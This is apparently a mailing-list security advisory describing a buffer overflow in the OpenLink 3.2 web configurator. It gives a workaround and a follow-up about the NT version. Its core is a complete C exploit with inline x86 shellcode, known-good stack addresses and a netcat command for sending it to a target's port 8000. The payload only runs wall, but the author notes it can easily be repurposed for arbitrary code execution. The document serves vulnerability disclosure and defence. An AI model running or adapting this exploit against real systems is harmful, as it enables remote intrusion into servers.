Overview: A serious security hole has been found in the web configuration utility that comes with OpenLink 3.2. This hole will allow remote users to execute arbitrary code as the user id under which the web configurator is run (inherited from the request broker, oplrqb). The hole is a run-of-the-mill buffer overflow, due to lack of parameter checking when strcpy() is used. Background: OpenLink is a database request broker, used for a generic interface to different database vendors' products. By default, a web configuration utility is installed, which runs at port 8000. For more information, see OpenLink Software's web site at http://www.openlinksw.com. Exploit: This exploit has been coded to be benign, and is just for illustration of the hole in the configuration utility. Furthermore, it has not been coded for portability (no promises that it will function if compiled with anything other than egcs-2.91.66, and it will not compile on a non-x86 compiler). This works against the linux glibc version of OpenLink 3.2's configurator. It can easily be modified for other purposes, however, and I have reason to believe that the majority, if not all, platforms are vulnerable to such an attack. A stack address may be specified on the command line (I've had luck with 0xbffffb65, 0xbffffb85 or 0xbffffbe5). Output of this should be piped through netcat, e.g. ./oplwall 0xbffffb85 | nc machine.to.hit 8000 --- cut --- #include #include /* * Exploit for Openlink's web configurator for Linux/glibc2 * use: pipe through netcat to openlink web port (8000 default) * ex: ./oplwall 0xbffffb85 | nc machine.to.hit 8000 * makes www_sv execute /usr/bin/wall if you hit the address right * * For informational purposes only. This was written to show that * there's a problem, not for skr1pt k1dd33z --. * don't ask me for help on how to use this to crack systems, * help compiling or anything else. It will only compile on * an x86 compiler however. * * Addresses that work for me: 0xbffffb65 (initial run of the broker) * 0xbffffb85 (all consecutive attempts) * probably tied to process ID www_sv runs as; * first try PIDs were in triple digits, others * 4 digit PIDs. * * If this works, generally no more www_sv processes will be run as a side effect. */ void test() { __asm__(" jmp doit exploit: # code basically from Aleph One's smash stacking article, with # minor mods popl %esi movb $0xd0, %al # Get a / character into %al xorb $0xff, %al movb %al, 0x1(%esi) # drop /s into place movb %al, 0x5(%esi) movb %al, 0x9(%esi) xorl %eax,%eax # clear %eax movb %eax,0xe(%esi) # drop a 0 at end of string movl %eax,0x13(%esi) # drop NULL for environment leal 0x13(%esi),%edx # point %edx to environment movl %esi,0xf(%esi) # drop pointer to argv leal 0xf(%esi),%ecx # point %ecx to argv movl %esi,%ebx # point ebx to command - 1 inc %ebx # fix it to point to the right place movb $0xb,%al # index to execve syscall int $0x80 # execute it xorl %ebx,%ebx # if exec failed, exit nicely... movl %ebx,%eax inc %eax int $0x80 doit: call exploit .string \"..usr.bin.wall.\" "); } char *shellcode = ((char *)test) + 3; char code[1000]; int main(int argc, char *argv[]) { int i; int left; unsigned char where[] = {"\0\0\0\0\0"} ; int *here; char *dummy; long addr; if (argc > 1) addr = strtoul(argv[1], &dummy, 0); else addr = 0xbffffb85; fprintf(stderr, "Setting address to %8x\n", addr); *((long *)where) = addr; strcpy(code, shellcode); for (i = 0; i < 64; i++) { strcat(code, where); } printf("GET %s\n", code); exit(0); } --- cut --- Workaround: Disable the www_sv application in oplrqb.ini. By default there is a section labeled Persistent Services, with the line "Configurator = www_sv". This section, along with the entire www_sv section, should be commented out with semicolons, e.g. ;[Persistent Services] ;Configurator = www_sv ;[www_sv] ;Program = w3config/www_sv ;Directory = w3config ;CommandLine = ;Environment = WWW_SV ;[Environment WWW_SV] Discussion: OpenLink software has been notified of the problem is is apparently working on a solution. I have serious concerns that the package may be prone to other attacks, but have no confirmation of this (other than basic DOS attacks). My suggestion is to definitely make sure any machine running the OpenLink broker is well protected behind a firewall, and it should not allow logins from untrusted persons. Kudos to: Aleph One, for his long-lived stack smashing article, and this whole BugTraq thing. Hobbit, of course, for netcat. -Tymm The NT version is vulnerable to a boundary condition as well. If memory serves (I looked at this last april, so it may be foggy) I was able to sucessfully modify the EIP but found no obvious way to get back to the overflowing buffer (where my egg would be). When I left off I found some code that would jump me back a little bit before the buffer. Unfortunately, the data formed some invalid opcodes, so no luck. I'm sure someone can figure it out, I'm sick having my clock off by 6 hours from SoftIce warp :)